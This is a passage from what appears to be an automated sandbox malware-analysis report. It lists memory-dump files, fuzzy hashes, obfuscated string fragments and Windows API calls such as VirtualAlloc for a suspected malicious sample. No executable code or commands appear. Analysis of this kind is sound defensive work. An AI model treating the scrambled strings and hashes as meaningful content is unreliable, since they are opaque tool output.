                                                                                                                • Associated: 00000000.00000002.1670417640.00000000007A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1670417640.00000000007B5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1670844921.00000000007B6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1670988874.0000000000959000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1671013969.000000000095A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_4b0000_Wvo9FU4qo9.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: AllocateHeap
                                                                                                                • String ID:
                                                                                                                • API String ID: 1279760036-0
                                                                                                                • Opcode ID: 3d2e11549d67db5f34bbd98719c9330b84d91cd40a2321c20b860d93e2332cfb
                                                                                                                • Instruction ID: 616a7957ea6e66f27150172a8ade657e95a797a25405532034f46ee48cdf639d
                                                                                                                • Opcode Fuzzy Hash: 3d2e11549d67db5f34bbd98719c9330b84d91cd40a2321c20b860d93e2332cfb
                                                                                                                • Instruction Fuzzy Hash: 67A001711845109ADA562B24BC09B887A21AB68621F124192E101590B68A62989AAA84
                                                                                                                APIs
                                                                                                                • VirtualAlloc.KERNELBASE(00000000), ref: 0050A1FF
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1670417640.0000000000505000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.1670331032.00000000004B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1670352087.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1670352087.00000000004F5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1670400714.0000000000503000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1670417640.0000000000690000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1670417640.0000000000774000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1670417640.000000000079D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1670417640.00000000007A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1670417640.00000000007B5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1670844921.00000000007B6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1670988874.0000000000959000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1671013969.000000000095A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_4b0000_Wvo9FU4qo9.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: AllocVirtual
                                                                                                                • String ID:
                                                                                                                • API String ID: 4275171209-0
                                                                                                                • Opcode ID: e434b2774f26e37eb4ba5e44beb9905b8c3fbe212e39da4ad1742b80fa5669c7
                                                                                                                • Instruction ID: 47e3b7fe7e8cc19025b4424c209586c2b52aeb90c2177f405b7180e0bc222cdf
                                                                                                                • Opcode Fuzzy Hash: e434b2774f26e37eb4ba5e44beb9905b8c3fbe212e39da4ad1742b80fa5669c7
                                                                                                                • Instruction Fuzzy Hash: 1CE01A35608249CBDB08AF38C45A2BE7BA1FF90311F254A1DDAA3826D0D7710CA0CA0B
                                                                                                                APIs
                                                                                                                • VirtualAlloc.KERNELBASE(00000000), ref: 00509A10
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1670417640.0000000000505000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.1670331032.00000000004B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1670352087.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1670352087.00000000004F5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1670400714.0000000000503000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1670417640.0000000000690000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1670417640.0000000000774000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1670417640.000000000079D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1670417640.00000000007A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1670417640.00000000007B5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1670844921.00000000007B6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1670988874.0000000000959000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1671013969.000000000095A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_4b0000_Wvo9FU4qo9.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: AllocVirtual
                                                                                                                • String ID:
                                                                                                                • API String ID: 4275171209-0
                                                                                                                • Opcode ID: 56291ddb5424cda6ac6cf36798c632f50168b7294b837205248ab37655f4c8de
                                                                                                                • Instruction ID: f61a75e60e2c491fcf8246852a59aac37f8b278f1fd821777106f9f1a6909b5b
                                                                                                                • Opcode Fuzzy Hash: 56291ddb5424cda6ac6cf36798c632f50168b7294b837205248ab37655f4c8de
                                                                                                                • Instruction Fuzzy Hash: 7FD0C9B010CA09DFD7406F1184846BDBFE0FF24340F214C2CE8C5A1294E2305850EB12
                                                                                                                APIs
                                                                                                                • RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000001E,00000000,00000000,?), ref: 004D43AA
                                                                                                                • RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000001E,00000000,?,?), ref: 004D443E
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1670352087.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.1670331032.00000000004B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1670352087.00000000004F5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1670400714.0000000000503000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1670417640.0000000000505000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1670417640.0000000000690000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1670417640.0000000000774000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1670417640.000000000079D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1670417640.00000000007A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1670417640.00000000007B5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1670844921.00000000007B6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1670988874.0000000000959000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1671013969.000000000095A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_4b0000_Wvo9FU4qo9.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: EnvironmentExpandStrings
                                                                                                                • String ID: +$e$+$e$ n l$%r?p$<j:h$=:$DD$N~4|$REM$Xs$bFM$e>n<$gd$r:i8$ut$13$=?$b`$tj$uw$y{$|r
                                                                                                                • API String ID: 237503144-1296415331
                                                                                                                • Opcode ID: 4c38ba35dafa76217cc8836a14582cd4f8e37fc3aa82a3720fe0eb132ffd4567
                                                                                                                • Instruction ID: b66060cb7308b5eda924298af3ef131d88b71aeab33d010d813e096c44777baf
                                                                                                                • Opcode Fuzzy Hash: 4c38ba35dafa76217cc8836a14582cd4f8e37fc3aa82a3720fe0eb132ffd4567
                                                                                                                • Instruction Fuzzy Hash: 87C20CB560C3848AD334CF54C8527DFBAF2EB82304F00892DD5E96B355D7B5864A8B9B
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1670352087.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.1670331032.00000000004B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1670352087.00000000004F5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1670400714.0000000000503000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1670417640.0000000000505000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1670417640.0000000000690000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1670417640.0000000000774000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1670417640.000000000079D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1670417640.00000000007A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1670417640.00000000007B5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1670844921.00000000007B6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1670988874.0000000000959000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1671013969.000000000095A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_4b0000_Wvo9FU4qo9.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: +$e$ n l$%r?p$<j:h$=:$DD$N~4|$REM$Xs$bFM$e>n<$gd$r:i8$ut$13$=?$b`$tj$uw$y{$|r
                                                                                                                • API String ID: 0-3493073112
                                                                                                                • Opcode ID: 43884cea24eb1300a985ecff35bfed3e4168c3b131ac0838db4332005aefabe3
                                                                                                                • Instruction ID: 984a4730c0713bdb9c29853094758adb994056e584b69f57788a421e5bf6cc8f
                                                                                                                • Opcode Fuzzy Hash: 43884cea24eb1300a985ecff35bfed3e4168c3b131ac0838db4332005aefabe3
                                                                                                                • Instruction Fuzzy Hash: 4AC20CB560C3848AE334CF54C852BDFBAF2EB82304F00892DD5E96B355D7B546498B9B
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1670352087.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.1670331032.00000000004B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1670352087.00000000004F5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1670400714.0000000000503000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1670417640.0000000000505000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1670417640.0000000000690000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1670417640.0000000000774000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1670417640.000000000079D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1670417640.00000000007A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1670417640.00000000007B5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1670844921.00000000007B6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1670988874.0000000000959000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1671013969.000000000095A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_4b0000_Wvo9FU4qo9.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: *,-"$3F&D$JyTK$ntxE$pt}w$qRb`$t~v:$uqrs$w}MI${zdy$~mfQ$L4$L4
                                                                                                                • API String ID: 0-2746398225
                                                                                                                • Opcode ID: 1ad2046644fa8d56428c271e529fabdfcbb71eae8ba9be8aad99e488b7e6314c
                                                                                                                • Instruction ID: 4bd228968a9ddedfcfde1fc41cea84d8df993072732fa07ccca6a535681278aa
                                                                                                                • Opcode Fuzzy Hash: 1ad2046644fa8d56428c271e529fabdfcbb71eae8ba9be8aad99e488b7e6314c
                                                                                                                • Instruction Fuzzy Hash: 4C4245B66083508FD7248F28D891BABB7E2BFD5304F1A893ED4D987355D7389806CB46
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1670417640.0000000000505000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.1670331032.00000000004B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1670352087.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1670352087.00000000004F5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1670400714.0000000000503000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1670417640.0000000000690000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1670417640.0000000000774000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1670417640.000000000079D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1670417640.00000000007A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1670417640.00000000007B5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1670844921.00000000007B6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1670988874.0000000000959000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1671013969.000000000095A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_4b0000_Wvo9FU4qo9.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: *b?$2K;[$FX;$Sy^$aV{~$~ G_
                                                                                                                • API String ID: 0-2395092767
                                                                                                                • Opcode ID: f4266d5e2521aea00140f602856909e3c0cfd582c9406f6ffbfd23d8539f4df2
                                                                                                                • Instruction ID: f49abebba7f5e4ba64d399b4731a1d70ccb3b35d0f29e8934efbcd7c58c54f9e
                                                                                                                • Opcode Fuzzy Hash: f4266d5e2521aea00140f602856909e3c0cfd582c9406f6ffbfd23d8539f4df2
                                                                                                                • Instruction Fuzzy Hash: 6AB217F360C2049FE304AE2DEC8567ABBE9EFD4720F1A853DE6C4C7744EA3558058696
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1670417640.0000000000505000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.1670331032.00000000004B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1670352087.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1670352087.00000000004F5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1670400714.0000000000503000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1670417640.0000000000690000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1670417640.0000000000774000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1670417640.000000000079D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1670417640.00000000007A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1670417640.00000000007B5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1670844921.00000000007B6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1670988874.0000000000959000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1671013969.000000000095A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_4b0000_Wvo9FU4qo9.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: 8/wg$;wo$P>Bk$P>Bk$cgF
                                                                                                                • API String ID: 0-1626097042
                                                                                                                • Opcode ID: 0f1e1d6f79626d7d2cf6fd07f8f29f21f6acf2e607e428a6a48c78dc960e1074
                                                                                                                • Instruction ID: c2468ceec779d21128b389fc4a360a9dbe5430d0919b7a7ed393f8e8918b68a3
                                                                                                                • Opcode Fuzzy Hash: 0f1e1d6f79626d7d2cf6fd07f8f29f21f6acf2e607e428a6a48c78dc960e1074
                                                                                                                • Instruction Fuzzy Hash: E4B2E7F350C204AFE304AF2DEC8567AFBE9EF94720F1A492DE6C587744EA3558018697
                                                                                                                APIs
                                                                                                                • RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000001E,00000000,00000000,?), ref: 004D84BD
                                                                                                                • RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000001E,00000000,?,?), ref: 004D85B4
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1670352087.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.1670331032.00000000004B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1670352087.00000000004F5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1670400714.0000000000503000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1670417640.0000000000505000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1670417640.0000000000690000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1670417640.0000000000774000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1670417640.000000000079D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1670417640.00000000007A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1670417640.00000000007B5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1670844921.00000000007B6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1670988874.0000000000959000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1671013969.000000000095A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_4b0000_Wvo9FU4qo9.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: EnvironmentExpandStrings
                                                                                                                • String ID: LF7Y$_^]\
                                                                                                                • API String ID: 237503144-3688711800
                                                                                                                • Opcode ID: f16106e26305662c870047e4c11b5050451884f9714557b34ed2688c7b1bd545
                                                                                                                • Instruction ID: 9fa43789cc1bf3361fbc258c8656f32bc4c9393be502b1afe9fb7fd569defc3a
                                                                                                                • Opcode Fuzzy Hash: f16106e26305662c870047e4c11b5050451884f9714557b34ed2688c7b1bd545
                                                                                                                • Instruction Fuzzy Hash: DF220271908341CFD3248F28D89072FB7E1BF85310F1A4A6EE599573A1D7399921CB5A
                                                                                                                APIs
                                                                                                                • RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000001E,00000000,00000000,?), ref: 004D84BD
                                                                                                                • RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000001E,00000000,?,?), ref: 004D85B4
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1670352087.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.1670331032.00000000004B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1670352087.00000000004F5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1670400714.0000000000503000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1670417640.0000000000505000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1670417640.0000000000690000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1670417640.0000000000774000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1670417640.000000000079D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1670417640.00000000007A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1670417640.00000000007B5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1670844921.00000000007B6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1670988874.0000000000959000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1671013969.000000000095A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_4b0000_Wvo9FU4qo9.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: EnvironmentExpandStrings
                                                                                                                • String ID: LF7Y$_^]\
                                                                                                                • API String ID: 237503144-3688711800
                                                                                                                • Opcode ID: ed6161eab0563a9d02224b88bcb97521bba9511f791a8b930865e5afceef3a29
                                                                                                                • Instruction ID: 168268c8b130215701aeeabde79ecaf79d3ba1751dae92b9505deb404f7ce04a
                                                                                                                • Opcode Fuzzy Hash: ed6161eab0563a9d02224b88bcb97521bba9511f791a8b930865e5afceef3a29
                                                                                                                • Instruction Fuzzy Hash: C2120271908341CFD3248F28D89072BBBE1FF89310F1A4A6EE599573A1D739D921CB5A
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1670352087.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.1670331032.00000000004B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1670352087.00000000004F5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1670400714.0000000000503000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1670417640.0000000000505000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1670417640.0000000000690000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1670417640.0000000000774000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1670417640.000000000079D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1670417640.00000000007A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1670417640.00000000007B5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1670844921.00000000007B6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1670988874.0000000000959000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1671013969.000000000095A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_4b0000_Wvo9FU4qo9.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: "_,Y$.[TU$;GsA$=K0E$pCj]
                                                                                                                • API String ID: 0-1171452581
                                                                                                                • Opcode ID: c7b4f03a1490b4515a6d99c370f26c5bf8553762c61679378c6ac7631652807f
                                                                                                                • Instruction ID: 6a11ff257a7ae61cc1930e1880d6be914085eb3d7fd985172f80ca45d760dc4d
                                                                                                                • Opcode Fuzzy Hash: c7b4f03a1490b4515a6d99c370f26c5bf8553762c61679378c6ac7631652807f
                                                                                                                • Instruction Fuzzy Hash: 519106716043009BC7209F25C8A1B67B7F5EF95314F14851EF9898B391E3B9D906C76A
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1670352087.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.1670331032.00000000004B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1670352087.00000000004F5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1670400714.0000000000503000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1670417640.0000000000505000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1670417640.0000000000690000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1670417640.0000000000774000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1670417640.000000000079D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1670417640.00000000007A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1670417640.00000000007B5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1670844921.00000000007B6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1670988874.0000000000959000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1671013969.000000000095A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_4b0000_Wvo9FU4qo9.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: 2h?n$7$SP$^`/4$gfff
                                                                                                                • API String ID: 0-3257051659
                                                                                                                • Opcode ID: ea7603e9954b579c8f5ca1b7196b5920b1c6741b930516f6c1e72f40eb6db326
                                                                                                                • Instruction ID: 9b4150293ab6c07527985298b34b6520c4c3ddb16d407adcff089a8ef51f3bd3
                                                                                                                • Opcode Fuzzy Hash: ea7603e9954b579c8f5ca1b7196b5920b1c6741b930516f6c1e72f40eb6db326
                                                                                                                • Instruction Fuzzy Hash: 6BA139B6A143504BD354CF28C851BAFB7E2FBC4318F598A3ED885D7391DB3898028786
                                                                                                                APIs
                                                                                                                • RtlExpandEnvironmentStrings.NTDLL(00000000,?,00000009,00000000,00000000,?), ref: 004D9170
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1670352087.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.1670331032.00000000004B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1670352087.00000000004F5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1670400714.0000000000503000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1670417640.0000000000505000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1670417640.0000000000690000.00000040.00000001.01000000.00000003.sdmpDownload File
